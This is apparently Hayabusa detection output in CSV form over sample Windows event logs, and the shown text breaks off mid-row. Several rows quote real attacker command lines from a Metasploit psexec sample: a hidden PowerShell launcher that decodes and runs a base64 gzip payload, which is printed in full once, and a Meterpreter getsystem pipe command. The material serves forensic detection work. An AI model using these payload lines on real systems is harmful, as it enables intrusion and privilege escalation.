Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:03:25.976 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:03:26.007 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:03:26.054 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:05:56.789 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:05:56.789 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:05:56.804 +00:00,IE10Win7,4688,medium,Persis,Net.exe User Account Creation,,rules/sigma/process_creation_builtin/proc_creation_win_net_user_add.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:05:56.804 +00:00,IE10Win7,4688,low,Disc | LatMov,Net.exe 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:21:12.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:54:49.500 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:54:49.500 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:03:32.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:43.213 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.112 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.268 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.315 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.331 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.346 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:10:56.377 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:45:12.871 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:45:18.574 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:45:25.147 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:46:27.941 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 15:46:32.738 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 16:33:53.404 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:34:04.272 +00:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:46.590 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:46.590 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:46.590 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:46.605 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4u
Fiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.605 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.605 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.605 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell 
Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx 
+2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.608 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x5fc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:46.790 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:58.162 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:58.162 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:58.162 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: genusn | Path: cmd.exe /c echo genusn > \\.\pipe\genusn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-20 16:35:58.169 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:58.169 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
cmd.exe /c echo genusn > \\.\pipe\genusn | Path: C:\Windows\System32\cmd.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 16:35:58.169 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-20 18:27:25.424 +00:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:39.918 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:42.755 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:42.802 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3bc | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:43.068 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:44.943 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\g4g34pot.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xc58 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:27:44.943 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:55.689 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:55.705 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x924 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-20 18:28:55.986 +00:00,IE10Win7,4688,low,Exec,Process 
